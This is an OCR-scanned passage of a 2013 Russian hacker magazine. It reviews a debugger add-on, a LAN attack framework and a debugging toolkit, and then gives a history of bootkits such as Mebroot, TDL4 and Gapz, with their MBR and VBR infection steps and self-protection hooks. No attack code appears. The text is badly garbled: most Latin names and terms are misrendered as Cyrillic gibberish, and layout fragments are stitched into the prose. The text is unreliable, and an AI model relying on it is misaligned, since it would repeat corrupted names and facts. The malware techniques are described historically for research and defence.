зпаге?/огоп 


Система: Мпих 


СОВ КАК ОМУ 

После того как долго работаешь в ОПУОБд или 
М/пОБоа в М/таом/5 и привыкаешь к их добротным 
интерфейсам, начинаешь испытывать трудно- 
сти при переходе к СБОВ в *пх-системах. Знаем 
по себе. 

Раньше для приведения СОВ к более-менее 
сносному виду существовал только специаль- 
но средактированный конфигурационный файл 
дати от хакера с ником Т@!. Но тут на свет по- 
явилось расширение \уо_гоп, которое написано 
на РуУПоп. Оно, конечно, не дублирует полностью 
интерфейс \\Итаом/5-собратьев, а лишь делает 
анализ данных и их вывод на экран более чита- 
емым. 

Архитектурно расширение работает следу- 
ющим образом: в основном окне терминала от- 
ладки запускается уоЙгоп зегуег, а в других тер- 
миналах — так называемые чем, ответственные 
за отображение того или иного Ш. На текущий 
момент реализованы следующие: 

. окно регистров; 

. окно стека; 

. окно дизассемблера; 
. окно расКгасе; 

. окно команд. 


А чтобы не мучиться с размещением окон, автор 
создал конфиг для Итихтаюг, где все окна уже 
сразу удобно расположены. 

Также при желании можно написать и соб- 
ственный мем/ — специально для этого был соз- 
дан подкласс ТетттаМем,. В результате полу- 
чается вполне неплохой интерфейс отладчика, 
который и не снился оригинальному СОВ. 

\УоНгоп функционирует в СОВ \6, СОВ \7 
и ИОВ и работает на системах с архитектурами 
х86 их86 64. 


где 1 = ЗНА-1, 2 = ЗНА-256, 3 = МО5. Формат входного файла 


УБох:—=/хагр$ зоо „/гагр 


е4 24 шодо1ез. ОВЕ: окпиб.сот/ 


паВюу7аг 


Система: Мпих 


( } Ай 5 г 

ИЯ \ у к. й 

( УМУ Е) 
[Уегззоп 0.10] 


[1] Розфзопегз [2] 00$ 
[3] ЗатЕЕега [4] 5са1 
[5] Рагашесее [6] 5е= 


[7] зезэатопа 


КОРОЛЬ ВЛОКАЛЬНОЙ СЕТИ 

Давненько у нас не было ничего связанного с се- 
тями. Встречай Гагр — инструмент для сетевых 
атак, сконцентрированный вокруг эксплуатации 
локальных сетей и вообще направленный на стек 
сетевых протоколов. Отравить сессию, пере- 
хватить ее, собрать необходимую информацию, 
эксплуатировать бреши в протоколе — все это 
утилита позволяет выполнить пентестеру в авто- 
матическом режиме. 

Различные встроенные снифферы включают 
в себя парсинг логинов и паролей для множе- 
ства известных протоколов. В инструменте также 
не забыты и ВоЗ-атаки. 

В перспективе автор проекта видит свое де- 
тище как модульный командный центр всей сети, 
откуда можно просматривать и сразу углубленно 
анализировать всю сеть. И это вполне возможно, 
так как Хагр полностью написан на РУПоп и име- 
ет хорошую модульную структуру. Из зависимо- 
стей проекта можно выделить: 

. ОЭсару (библиотека для крафтинга пакетов); 

. аттоп-пд зийе (мониторинг беспроводных 
сетей); 

. сраитр (сниффер); 

. рагатко ($$12-модуль для РУПоп); 

. пюЮчече-бтатод$5. 


Гагр уже включает в себя несколько десят- 
вков модулей, которые разбиты на разные раз- 
делы: 

. пойзнеры; 

. 005; 

. снифферы; 

. сканеры; 

. взлом параметров сети; 
. взлом сервисов; 

. атаки на сессии. 


Автор: Вгуап Атехапдег 


Автор: Кепзпо{о 
ОВЕ: \у151.Кепзпоо. 
сот/икКУМатРаде 
Система: М/Ип/Чпих/ 
Мас/В$0/5о!ап$ 


ПРОГРАММИРУЕМАЯ ОТЛАДКА 

Время идет, и все меняется, в том числе и хакер- 

ский подход к отладке программ. Затертая <Е8> 

уже давно не в моде, Зо СЕ мертв, а ОПУуОБа ни- 

как не справится с некоторыми ограничениями. 

Из ветеранов осталась троица в лице: 

. РА сотладчиком и РАРУПоп; 

. \МЛпОБа с РУКа; 

. |мтипКуО6бс, написанный на РУПоп, с кол- 
лекцией плагинов и скриптов для людей в се- 
рых шляпах. 


В целом настало золотое время для програм- 
мируемой отладки на РуПоп, независимо от об- 
ласти применения. Ни исследование таМ/аге, 
ни поиск багов без автоматизации не обходится. 

Пора представить тулкит УОВ, построенный 
на \Мгасе от шмзю90О{ из легендарной команды 
кепзпото. Они много лет устраивали ВЕР СОМ СТЕ: 
участники хорошо помнят, насколько интересные 
и крутые бинарные задания они создавали. 

\УОВ (кстати, в прошлом приватный инстру- 
мент) отличается обширным функционалом 
и наличием документации в основном в коде. 
По правде говоря, другой документации, кро- 
ме как в исходниках, не существует. А сам код 
по себе очень хардкорный, изобилующий ис- 
пользованием различных недокументированных 
функций ОС. Так что это точно не инструмент 
скрипт-кидди. 

Для тех, кто засиделся на\\ЛИп32Л№Мтб4, кросс- 
платформенность идет приятным бонусом. Под- 
держиваются почти все системы: \М/паом/$, Ипих, 
ОЗ Х, В$0, Зо!ап$. Честности ради стоит сказать, 
что не для всех платформ работает весь функци- 
онал — местами он отличается, что, в принципе, 
легко объяснить. Использование СШ на С\ опци- 
онально. 


Ма/!игаге ХАКЕР 09 /176/ 2013 


][-исследование: самая полная история ^^ 
буткитов, написанная человеком _—_‚ ен 
за последние 2000 лет! 
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Летопись буткитов 


ТОТ 


Антивирусы 90-х очень серьезно относились к проблеме буткитов. Их авторы советовали ни- 
когда не забывать дискету в дисководе А:, они всегда проверяли этот диск перед выключением 
компьютера. Внезапно «загрузочные вирусы» из прошлого в нашем объективном настоящем 
снова оказались на коне! Посмотрим, какого уровня развития они сейчас достигли. 


ПЕРВООТКРЫВАТЕЛИ ЖАНРА 

Одним из первых вирусов для платформы 1ВМ 
РС, работающих в среде М$-00$, был Вгат, 
созданный в далеком 1986 году. Вирус Вгат был 
не файловым, а загрузочным — он инфицировал 
5-дюймовые дискеты, так как винчестеры тогда 
еще не были широко распространены. После за- 
ражения вредоносный код постепенно заполнял 
все свободное пространство дискеты, так что ис- 
пользовать ее становилось невозможно. Авторы 
Вгат — братья Басит Фарух Алви и Амджад Фа- 
рух Алви из Пакистана, которые решили написать 
программу для защиты своих медицинских про- 
грамм от пиратов. Они даже разместили в коде 
программы свои адреса и телефоны — чтобы 
получить средства удаления Вгат. 

Однако потом, когда распространение ви- 
руса приняло масштабы эпидемии, братья Алви 
под шквалом телефонных звонков были вынуж- 
дены сменить место работы и телефонные но- 
мера. На этом их опыт вирусописательства и за- 
кончился. 

В 1987 году из-под пера одного студента 
из Новой Зеландии вышел очередной вирус, 
заражающий МВН дискет и жестких дисков. На- 
звание ему дали ЗЧопеа, так как при загрузке 
компьютера вирус в одном случае из восьми 
выводил сообщение: «\оигРС 1$ пом Зюпеа!» — 
«Ваш компьютер сейчас балдеет!». Кроме того, 
внутри кода вируса содержался призыв к лега- 
лизации марихуаны (1едай5е Мапиапа). З{опеа 
в начале 90-х годов долгое время беспокоил си- 
садминов по всему миру. Сам вирус по нынеш- 
ним меркам был совсем маленьким — всего 512 
байт (один сектор). Оригинальный сектор сохра- 
нялся в другом месте диска, его расположение 
было разным для дискеты и винчестера. В про- 
цессе работы перехватывалось прерывание 
131 (дисковые операции В!0$), что позволяло 
определять моменты работы ОС с дискетой и за- 
ражать ее в это время. Тогда никто не мог пред- 
полагать, что спустя двадцать лет идеи, реали- 
зованные в Вгат и Зюпеа, обретут свое второе 
рождение в виде буткитов — вредоносных про- 
грамм, скрывающих свое присутствие в недрах 
операционной системы, получая управление 
до ее загрузки. Мало того, один из концептуаль- 
ных проектов так и называется в честь своего 
предшественника — Зопед Вос{КИ. 


ОТКОНЦЕПТАДО «СЕРИЙНОГО» ОБРАЗЦА 
Появлению т {пе Ма первых образцов та№аге, 
использующих технику получения управления 
до загрузки \\МИпао\м$, предшествовали несколь- 
ко концептуальных наработок. Во-первых, это 
проект ВосВоот (работал на системах \\МИпо\м$ 
2000/ХР), представленный на конференции В!аск 
На! ЧЗА 2005 Дереком Сёдером (Бегек Зоеаег) 
и Райаном Пермехом (Вуап Рептей) из компании 
еЕуе Оюка! Зесигйу (ееуе.сот). Во-вторых — ра- 
бота Мбос\КИ (демонстрация работы на Ма ВС1/ 
ВС2) от Найтина и Вайпина Кумаров (МИит и Мрт 
Китаг), индийских исследователей систем без- 
опасности из компании М\Маб$ (п\/аб$.1п). До- 
клад о УБос\КИ был представлен на конференциях 
Васк На{ и Наск т {Пе Вох в 2007 году и демон- 


стрировал возможность обхода защитных меха- 
низмов ОС За — проверку цифровых подписей 
загружаемых драйверов. 

«Классическим» представителем буткитов 
принято считать Мебгоо{ф — вредонос, первые 
штаммы которого были обнаружены антивирус- 
ными компаниями в конце 2007 года. Мебгос 
использовал многочисленные заимствования 
из проекта ВофВос{. Анализ первого поколения 
Мергоот (уегзюп 0) показал, что ботнет на его 
основе работал в тестовом режиме, о чем свиде- 
тельствует большое количество отладочных со- 
общений, отправляемых на управляющий сервер. 
Как отмечают некоторые реверсеры, в этой вер- 
сии отчетливо прослеживалось использование 
при программировании метода сору-ра$е (есть 
некоторое количество багов) без четкого пред- 
ставления о работе отдельных участков кода. Не- 
смотря на ошибки, Мебгост без колебаний можно 
отнести к разряду !-+{есп-вредоносов. 

В интернете Мебго<{ часто называют Это\мма|, 
тогда как Зто\ма! (ака Тогра или Апзейп) — из- 
вестное с 2005 года семейство троянских про- 
грамм, на базе которых формировался ботнет. 
Главная цель этого ботнета — кража информации 
для организации несанкционированных банков- 
ских операций. Так что Мебгоо{т — это загрузчик 
тома]. 

Устанавливал Мебгоо{ дроппер размером 
от 250 до 350 Кб в ранних версиях и до 430 Кб 
в более поздних. Ранняя версия дроппера за- 
ражала жесткий диск спустя 20 минут, а спустя 
еще 20 вызывала перезагрузку ОС. Прямой до- 
ступ к диску в этой версии осуществлялся стан- 
дартными функциями \М/пАР!, а именно вызо- 
вом СгежеРе с открытием устройства \Шемсе\ 


ЕР@7С00 


а) ЕР@0040 


Рис. 1. Этапы загрузки Мебгоо{ 


(4) 


Нагаа!5Ко\ОНО (в более поздних версиях — 
\??\АеаНага0!$КМ и \??\Рпузса!пуем). Причем 
прямой доступ к диску осуществлялся из ппа 3 
(неипа 0!) при наличии прав администратора. На- 
чиная с висты, прямой доступ к диску из пользо- 
вательского режима был заблокирован, и Мебгос{ 
\уегзюоп 1, активно распространяемый в феврале 
2008-го уже в рабочем режиме, для записи ис- 
пользовал загрузку собственного драйвера, вы- 
полнявшего роль переходника к системному 
драйверу 415К.5у$. 

Компоненты буткита размещались в следую- 
щих местах диска: 
. сектор 0 — загрузчик; 

сектор 60 — патчер файлов ОС; 

сектор 61 — код, отвечающий за загрузку вре- 

доносного драйвера; 

сектор 62 — оригинальная МВВ из сектора 0; 

последние неиспользуемые сектора (около 

650) — вредоносный драйвер. 


Инициализация Мебгооф при перезагрузке 
ОС происходила в несколько этапов (см. рис. 1): 
1. Загрузчик выделял 2 Кб памяти и перемещал 

свой код с адреса 0х7СО00 в 0х0000. 

2. Содержимое секторов 60 и 61 загружалось 
в выделенную область памяти. 

3. Обработчик прерывания 13В перехватывался 
(устанавливался в адрес 0х0040). 

4. По адресу 0х7СО00 загружалась оригинальная 
МВН из сектора 62, и управление передава- 
лось ей. 

5. Перехватчик прерывания 13П отслеживал мо- 
мент загрузки модуля озоааег (часть паг) 
путем поиска определенной сигнатуры и мо- 


дифицировал его. 
9 Метогу 


то2 Ма/!игаге 


6. Пропатченный озоааег выполнял шелл- 
код (сектор 60), который искал и подменял 
в що5кгй|.ехе функцию моти5у чет. 

7. Пропатченный щозкгй.ехе выполнял шелл- 
код (сектор 61). 

8. Шелл-код в тозкит!.ехе выполнял загрузку 
вредоносного драйвера, хранившегося в по- 
следних секторах. 


Мебгоо{ довольно успешно скрывал свое 
присутствие в системе от антивирусных про- 
грамм, так как не производил никаких изменений 
в файловой системе и реестре, за исключением 
сохраненной в зашифрованном виде полезной 
нагрузки. Она скачивалась вредоносным драйве- 
ром, реализующим скрытый канал передачи дан- 
ных на основе перехвата функций №0!$ драйвера 
сетевой подсистемы, что позволяло успешно 
обходить файрвол. Кроме того, драйвер отвечал 
за механизмы сокрытия и самозащиты, пере- 
хватывая две функции из @1$К.зу$: 1ВР_МУ ВЕАО 
и |1АР_ МУ \ММВПЕ. Первая позволяет скрывать 
истинное содержимое используемых буткитом 
секторов жесткого диска при их чтении, а вторая 
предотвращала перезапись МВВ. 

Для взаимодействия с управляющими сер- 
верами кроме жестко заданного имени исполь- 
зовался механизм динамического формирова- 
ния доменных имен (ОСА — ПБотат СепегаНоп 
Або). В качестве исходных данных бралась 
текущая дата, получаемая из системы, а в поздних 
версиях — путем парсинга временных меток в от- 
ветах серверов Сооде. Канал передачи данных 
шифровался. Полезная нагрузка представляла 
собой зашифрованный контейнер, содержащий 
две О. и инструкции, в какие процессы подгру- 
жать вторую из них (первая внедрялась в процесс 
зегмсе5.ехе). Контейнер подвергался расшиф- 
ровке, затем снова шифровался другим ключом 
и сохранялся в каталоге %Зует\% в виде файла, 
имя которого выбирается из имеющихся в этом 
каталоге файлов, а расширение случайное. О. 
внедренная в процессы браузеров, на лету моди- 
фицировала НТМ!-страницы банковских сайтов 
(путем внедрения Нгате и |5спр\) и перехватыва- 
ла банковские реквизиты доступа (логины и паро- 
ли), которые опять-таки в зашифрованном виде 
отправлялись на серверы злоумышленников. 

По ходу развития версий Мебгосо{ видно, 
что его разработчики пристально следили за вы- 
пуском средств лечения от производителей анти- 
вирусов, анализировали используемые методы 
обнаружения и оперативно реагировали выпу- 
ском новых версий, снова невидимых для анти- 
вирусов и с апгрейдом алгоритмов самозащиты. 
Так, в версии марта 2008 года перехватывались 
уже все функции из &1$К.зу$, а за их изменением 
следил отдельный поток (м/аёспаод). Если какая- 
либо антивирусная утилита пыталась «вернуть 
все как было», перехваты восстанавливались 
и диск заражался повторно. 

В апреле 2009 года Мебгост уже освоил и но- 
вомодную на тот момент \МАМпао\м$ Ма. 


ИСНОВА КОНЦЕПТЫ 

Детальный анализ кода Мебгоот можно найти 
на сайте $опеЯ-меппа.сот авторства Питера 
Клайснера (Рег Ке!$5пег), который, видимо, 
под впечатлением от обнаруженного решил за- 
мутить свой буткит с блекджеком и шлюхами, 
в смысле — принялся за разработку своего про- 
екта З4опеяа Воск, представленного на Васк 
НаЕ ЧЗА 2009. Сам Питер Клайснер утверждает, 
что его проект носит чисто исследовательский 
характер и помогает сотрудникам антивирусных 
лабораторий разрабатывать новые методы про- 


тиводействия таким видам малвари. В конечном 
итоге проект З{4опе Вос1Кй стал настолько по- 
пулярным, что его полные последние версии, под 
давлением антивирусных компаний, не выкла- 
дываются в открытый доступ, а рибИс Ще версия 
довольно сильно урезана в плане функциональ- 
ности. Как показали дальнейшие события, Зюпеа 
Вос<{КЕ стал отличной отправной точкой для мно- 
гих злоумышленников, которые решили наделить 
свои поделки функциями буткита. Вот, например, 
\Мп!5 ег Воск. Какие-то предприимчивые това- 
рищи взяли Зопед у2 Арпа 3 от 20 октября 2009 
года, подрихтовали напильником и в начале 2010 
года стали предлагать к продаже. В качестве ре- 
кламы в одном из блогов была размещена инфор- 
мация о новом интересном бутките, который за- 
пускал вредоносные файлы из каталога С:\Зу$ет 
Уоите шпюгтаНоп с правами МТ-АЧТНОВАГМУ\ 
ЗУЗТЕМ. 

В том же 2009 году Найтин и Вайпин Кума- 
ры в рамках прошедшей в Дубае конференции 
Наск ш Тпе Вох продемонстрировали Убоски 
версии 2.0, на этот раз заточенный под \\МИп9о\$ 
7 хб4. Примененные в нем методы позволили 
успешно нейтрализовать действие механизмов 
Ра1спСиа!га и Опуег Зюптоа Ройсу, которые не да- 
вали модифицировать ряд системных объектов 
для реализации перехватов функций и загру- 
жать неподписанные драйверы, чтобы получить 
возможность выполнения кода в режиме ядра. 
Поначалу выложенные под лицензией СРЕ ис- 
ходные коды проекта \УбосКИ постигла участь 
исходников З1опеа Вос" — они точно так же 
были выпилены, дабы не плодить очередную 
толпу скрипт-киддисов. Однако заинтересован- 
ные в теме лица необходимые для своей черной 
работы материалы все равно успели получить, 
и все заверте... 

Кроме собственно проекта ЗюпеЯ Вос\КИ, 
на сайте Зопед-меппа.сот в разделе статей на- 
ходятся несколько материалов, посвященных 
исследованию и анализу некоторых образцов 
пам/аге. Вот, например, анализ одной из китай- 
ских поделок — товарищи из КНР внимательно 
изучили Мебгос{ и прикрутили функции буткита 
к своему трояну со звучным названием Спо$ 
ЗПадом, сокращенный аналитиками М!сго$ой 
до Споао\м/. Получившийся гибрид, обнаружен- 
ный бутащтес в марте 2010 года, известен под на- 
званием Тго]ап.Мебгайх.В. Хотя отдельные участ- 
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ки его кода начисто слизаны с Мебгост, некоторые 
особенности были достаточно интересными. Так, 
для уменьшения вероятности обнаружения по из- 
менению МВН Мебганх не переписывал его це- 
ликом, а лишь изменял аргументы инструкции 
тоу, находящейся по смещению 00001 от начала 
загрузочного кода таким образом, чтобы чтение 
сектора и передача управления происходила 
не в первый сектор загрузочного раздела, а во 
второй сектор диска, содержащий продолжение 
Мебганцх. Эта часть загрузочного кода выполня- 
ла чтение 59 секторов жесткого диска (начиная 
со второго сектора) в память. В этих секторах 
хранились все остальные компоненты буткита, 
причем сектора со второго по четвертый были 
зашифрованы с помощью операции ХОР, ключ 
для которой вычисляется динамически на каждой 
итерации получения очередного значения байта. 
Начиная с пятого сектора хранился драйвер раз- 
мером около 17 Кб. Назначение драйвера бутки- 
та — внедрение кода пользовательского режима 
в процесс ехрогегехе и установка перехватов 
на обработчики 1ВР-запросов типа !ВР_ М. ВЕАО/ 
|ВР_МУ М/ВПЕ драйвера класса диска О01$К.5уз. 
Указанные перехваты обеспечивали защиту сек- 
торов диска, в которых хранились компоненты 
буткита, от попыток чтения или перезаписи. 


ЛЮБИТЕЛЬ КУЛЬТОВЫХ ФИЛЬМОВ 

Знамя Ш-+есй-вредоносов успешно подхватило 
семейство ТОПЕ, трансформировавшееся в буткит 
в версии ТО|4 (аКа Тазегу или О!тайк по ЕЗЕТ — 
и где они такие названия берут?). Интересный 
факт о ТОГ: у авторов отличное чувство юмора, 
в коде встречаются отладочные строки — цитаты 
из культовых кинопроизведений («Бойцовский 
клуб», «Страх и ненависть в Лас-Вегасе», «Звезд- 
ные войны»...). По непроверенной информации, 
за созданием ТОЁЕ первых трех версий стоял 
человек с ником Туег Вигаеп, а ТОЁ расшифро- 
вывался как ТУег Бигаеп [оааег (хотя с равным 
успехом он мог бы расшифровываться как Тго]ап 
ОомпЁЕоааег — версии такие версии). Предпола- 
гают, что ТУег Бигаеп был одним из сотрудников 
компании Сотоадо. Как говорят, бизнес на базе 
ТОЕЗ было решено свернуть после взлома со- 
трудниками Езаде [аб командных серверов ТОЕЗ 
и партнерской программы ГБодта МИоп (51. 
1у/16Р4 Зи), что привело к утечке базы клиентов, 
которая сначала ходила в привате, а потом, по слу- 


Рис. 2. Как ЕуЙСоге 
модифицирует 
память 
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хам, попала в руки органов летом 2010 года. ТО 4 
разрабатывался другими кодерами из исходников 
третьей версии, купленной за 65 тысяч долларов. 

Так или иначе, в июле 2010-го выходит ТО4 
0.01, а уже в августе 2010-го — ТО\4 0.02 с под- 
держкой хб4 операционных систем, став первым 
образцом таМаге такого вида, обнаруженным т 
{пе\ла. Проект Зюпед Вос{КИ получил поддержку 
платформ хб4 только в 2011 году. 

Подхватив удачную идею Мебгосот о хране- 
нии своих компонентов вне файловой системы, 
разработчик ТОЁ еще в третьей версии развил 
ее до концепции хранилища с виртуальной фай- 
ловой системой. Доступ к хранилищу обеспечи- 
вался драйвером-руткитом, который, кроме того 
что обладал функциями сокрытия и самозащиты, 
создавал виртуальное устройство, что позволяло 
при работе с файлами использовать стандартные 
функции М/тАР!, такие как СгемеЕИе(), \ММщегИе(), 
ВеааЕ!е(). Компоненты ТОЕ4 хранились в специ- 
альной области (размером не более 8 Мб) в конце 
жесткого диска. В зашифрованном алгоритмом 
АС4 хранилище размещались основные модули 
с именами 14аг1б, 149г32, 194гб4, конфигурацион- 
ный файл, а также другие модули, загружаемые 
по сети. Код в МВН передавал управление ком- 
поненту 14г16. После передачи управления 14аг16 
перехватывал функции работы с жестким диском. 
Для загрузки ТОЕ4 использовалась подмена фай- 
ла Касот.а! (путем установки перехватчика на 1 
1ЗА и поиска определенной сигнатуры Касот. 
а!!), который необходим для инициализации ядра 
на стадии загрузки. Вместо Касот.аЙ в итоге за- 
гружался вредоносный компонент 1агЗ2 или 14г64 
в зависимости от разрядности целевой ОС. Би- 
нарный код 14гЗ2 и 19гб4 практически идентичен, 
так как он скомпилирован из одних исходников. 

Версия ТОЁ4 0.03, вышедшая в сентябре 
2010-го, для повышения своих привилегий в си- 
стеме использовала эксплуатацию уязвимости 
в Тазк оспедащег, закрытую патчем М$10-092. 
При этом \\МИпаом/$ ХР не заражалась, в ней дроп- 
пер просто завершал свою работу. 


НОВЫЕ ГОРИЗОНТЫ 

Существующие до 2011 года буткиты изменяли 
компоненты ОС в процессе загрузки, перехватив 
прерывания ВОЗ 131. А между тем эта техника 
использовалась еще во времена М$-0О05, и ей 
свойственны определенные недостатки: пере- 
хваченный обработчик исполняется только до за- 
грузки ядра, так как далее прерывания ВО$ уже 
не используются, кроме того, сигнатурный поиск 


ЗАЩИТА \\ИМОО\/$ 


РагИ оп {аЫе егугу #2 


Перед заражением 
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Рачюоп ещгу 


Рис. 3. Изменения, вносимые $$Т в МВВ 


нужного модуля может не сработать, если ис- 
комый паттерн будет находиться между двумя 
секторами. Поэтому два студента Австрийского 
университета прикладных наук Вольфганг Этлин- 
гер (\ММо№дапа Етоаег) и Стефан Фибек (ЗеТап 
\Лейьбск) пораскинули мозгами и пришли к выво- 
ду, что можно задействовать такую фичу, как мно- 
гоядерность современных процессоров. Пускай 
загрузка происходит на одном ядре, а на втором 
в это время будет крутиться вредоносный код, 
который и будет патчить компоненты ОС. Прото- 
тип буткита, построенного на этом принципе, был 
представлен на МтаСоп 2011 под кодовым назва- 
нием ЕМСоге. В общих чертах алгоритм работы 
его был следующим: 

. после загрузки вредоносной МВВ ЕМИСоге от- 
ключается режим Зуттеис Мий Ргосезпод, 
который ограничивает число процессорных 
ядерв ОС; 

. уменьшается размер памяти, доступный ОС; 


. код переносится в конец физической памяти, 
не используемой ОС, сам при этом продолжа- 
етвыполняться в кеше СРЦ; 

. наядре СРОИО управление передается загруз- 
чику ОС, а на СРУ1Л продолжает выполняться 
код ЕМ!Соге в режиме ядра и с полным досту- 
пом ко всей физической памяти. 


А вот как происходит изменение кода ядра: 

. в точку входа вставляется бесконечный цикл 
в виде инструкции пр; 

. пока СРУО работает вхолостую, можно произ- 
водить необходимые модификации; 

.‚ после изменения бесконечный цикл вставля- 
ется в следующий блок кода; 

. точка входа восстанавливается. 


Пример патча приведен на рис. 2. 
При демонстрации прототипа указывалось 
на следующие недостатки: минус одно ядро вТазк 


Активным продвижением технологий хб4 на рынке десктопных операцио- 
нок компания М!сго5ой начала заниматься с версии \\МИпдоми$ Ма. Спра- 
ведливости ради следует упомянуть о существовании ХР хб4, которая в по- 
следней своей редакции была собрана из кода \МИпаоми$ Зегуег 2003. Кроме 
явного преимущества в виде поддержки количества оперативки, большей 
4 Гб, в 64-битных системах появилось несколько технологий, направленных 
на защиту от воздействия вредоносного ПО. Одна из них — РайпО@чага, 
которая отслеживает изменение критических объектов ядра ОС, таких как: 
. таблица глобальных дескрипторов — СОТ; 
. таблица дескрипторов прерываний — 0Т; 
. таблица дескрипторов системных сервисов — ЗЗОТ; 
некоторые системные файлы, например МТОЗКАМЕ.ЕХЕ, №М0!$.$\У$, НА(. 
ОЕ; 
служебные М$В-регистры ЭТАРВ/ЕЗТАР/СЗТАР/ЗЕМАЗК. 


При загрузке, в рамках функционирования Раёсп@чага, ОС подсчи- 
тывает контрольные суммы для указанных выше объектов, сохраняет их 
и периодически проверяет соответствие текущих значений с сохранен- 
ными. Обнаружив модификацию объектов (по изменению контрольной 
суммы), ОС аварийно завершает свою работу с вызовом ВЗОР. Кроме 
РаспСиага, появился еще один защитный механизм — запрет загрузки 
драйверов, не имеющих валидной цифровой подписи (Опуег З9пто 
Ройсу). 

Механизмы Распбиага и Опуег Зопто Ройсу значительно усложни- 
ли жизнь разработчикам вредоносных программ с функциями руткита, 
работающих в режиме ядра. Это вынудило злоумышленников искать 
обходные пути для обеспечения функционирования своих вредоносов 
и вконечном итоге привело к возникновению особого класса тамМ/аге — 
рос{КК (сочетание слов Бос] и гоо{КИ). 


104 Ма/!игаге 


Рис. 4. Сар2 получает управление, изменив 4 байта ВРВ 


пападег (палево!) и снижение производитель- 
ности. Первая проблема легко решается, доступ 
к памяти есть, поэтому число СРУ можно просто 
подправить. Решение второй тоже тривиально: 
после патча компонентов ОС завершить выпол- 
нение вредоносного кода и освободить ядро про- 
цессора. Пока эти наработки в «массы» не пошли, 
поэтому в настоящее время образцов таМаге, 
созданных по подобию ЕМ/Соге, «в диком виде» 
не выявлено. 


ПРОДОЛЖАТЕЛИ ДЕЛАТОЕ 

ТОЕ со временем обрел много преемников. Оче- 
редная киберпреступная группировка (будем 
называть ее Ргадта, такие идентификаторы со- 
держались в их коде) прибрала к рукам исходники 
ТОЕЗ и ТОЁ4 и стала клепать свои альтернатив- 
ные версии этих вредоносов под названием $5Т 
или Мах$$ (Отазсо по ЕЗЕТ). Преемственность 
кодов ТОЁ привела к тому, что в классификации 
многих антивирусных вендоров царит полная не- 
разбериха и, по сути, разные семейства продол- 
жают именоваться как их предок (ТОЕ, ТО$$ или 
Тазегу). Продажа кодов ТО!4 не привела кего ис- 
чезновению, этот проект продолжил развиваться 
параллельно проекту $5Т. 

ТОЕЗ рвазеа вариант З$Т (с заражением драй- 
вера) распространялся с начала 2011 года до на- 
чала лета, когда пошли загрузки тестовой вер- 
сии ЭТ на базе ТО4 с заражением МВД. На то, 
что это тестовая версия, указывал большой объем 
трассировочных логов, отправляемых на С&С во 
время установки, а также многочисленные со- 
общения об ошибках, которые буткит отправлял 
во время своей работы. Из фишек сотрудники 
компании М!сгозой отметили очень интересный 
способ «резервного» канала восстановления свя- 
зи 55Т со своими командными серверами. Кон- 
фигурационный файл с их адресами содержался 
в файлах формата УР@, которые размещались 
на хостинге итадезпаск.и$. Ссылки на такие изо- 
бражения содержались в постах, опубликованных 
на популярных блогерских площадках меоигпа|. 
сот и м/огарге$$.сот. 

Так или иначе, тестовая версия в августе 
была заменена новой и содержала в себе уже 
несколько иной способ получения управления 


Файловая 


система МТЕ$ 


Перед заражением 


После заражения 


Файловая 
система 


МТЕ$ 


при загрузке (см. рис. 3). Исполняемый код МВА 
не изменялся вовсе, а хранилище файлов орга- 
низовывалось не просто в последних секторах 
диска, а в виде отдельного раздела размером 
до 15 Мб. Флаг активного раздела изменялся 
с загрузочного раздела ОС на раздел $5$Т. Файло- 
вая система раздела с хранилищем в целом по- 
вторяла ФС ТО!4, однако содержала некоторые 
улучшения, в частности было убрано ограничение 
на 15 файлов, а сами файлы в заголовке содер- 
жали контрольную сумму СВСЗ2. Это позволяло 
реализовать в ФС проверку на целостность, в слу- 
чае обнаружения повреждений файл удалялся 
из хранилища. 

В конце года на сцену вышел форк ТОЕ4 
под неблагозвучным названием Ртаг, который 
по своим характеристикам почти не отличался 
от оригинального ТОЕ4. В нем был применен ряд 
мер, изменяющих сигнатурные характеристики 
компонентов. Например, шифровался не раздел 
целиком, а только файл конфигурации. В заго- 
ловке этого файла, кстати, присутствовала строка 
[РигреНаге] — по всей видимости отсылка к пес- 
не легендарного Джимми Хендрикса. 

Дроппер Рпаг использовал для своей установ- 
ки метод ОШ: Пуасктод с применением легального 
установщика Адобе Назй Р!ауег. Эту же фишку 
использовал ГегоАссе$$, разве что имена библи- 
отек различались (псгурт.а! вместо т$итд32.а!). 

В 2012 году компания ВатбайЙа представи- 
ла аналитический отчет под названием «А Мем 
Кеганоп о? {пе ТО$$У/ТОЕ4 Мамаге Узта ОСА- 
базеа Соттапа-апа-Сотго». В нем говорилось, 
что обнаружен трафик, аналогичный по своим 
параметрам семейству ТО. Он был выявлен с по- 
мощью автоматизированной системы «Плеяды» 
(Реадез), предназначенной для обнаружения 
малвари, использующей механизм ОСА для свя- 
зи со своими С&С. Дальнейший анализ показал, 
что это действительно новая модификация ТО|4, 
его алгоритм генерации доменных имен назвали 
ОСА\14. 

По информации ресурса Кегтетоае.штто, 
потомки ТОЁ4 с обфусцированным конфигом 
(осмысленные имена вида 19116, |4г32, 14г64 за- 
менены числовыми строками) встречаются в ин- 
тернете до сих пор. 
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САМЫЙ СЛОЖНЫЙ, НО НЕСАМЫЙ 
СКРЫТНЫИ 

Звание одного из самых навороченных буткитов 
следует отдать Сарой. Чего стоит один только мо- 
дуль режима ядра, содержащий собственную ре- 
ализацию стека ТСРЛР-протокола, что позволяет 
ему обойти проверку локальных 1Р$/10$ при вза- 
имодействии с сетью! Интересная особенность 
вредоносного кода режима ядра заключается 
в том, что он не имеет структуры исполняемого 
РЕ-файла. Вместо этого он разбит на несколько 
функциональных блоков, имеющих собственные 
заголовки. В процессе загрузки Сарг анализиру- 
ет заголовок каждого блока и вызывает его функ- 
цию инициализации, которая, в свою очередь, 
выделяет память и заполняет их указателями 
на функции блока, а также различными структу- 
рами данных. Блоки модулей могли размещаться 
в секторах или до первого, или после последнего 
раздела. Хранилище рауоаЧ представляло со- 
бой файл (содержимое зашифровано АЕЗ-256) 
в каталоге учет Моите шогтаНоп системного 
диска с именем из случайных Пех-значений. Фай- 
ловая система хранилища — ЕАТЗ2, реализация 
которой взята из опенсорсного проекта Ри!ЕАТ. 

Сар7 имеет несколько версий, различающих- 
ся методами загрузки, летом 2012-го заражалась 
МВВ, а осенью — \ВР, причем довольно интерес- 
ным способом. \/8ВВ тома МТЕЗ$ содержит в себе 
структуру данных, называемую ВОЗ Рагатщег 
Воск (ВРВ), где указываются параметры тома. 
В ВРВ есть поле Надеп$еог$, которое указы- 
вает на начало шша! Ргодгат [1оааег (РЕ) — кода, 
на который передается управление после У\ВВН. 
|РЁЕ отвечает за поиск загрузчика в файловой 
системе тома МТЕ$ и его запуск. Изменением 
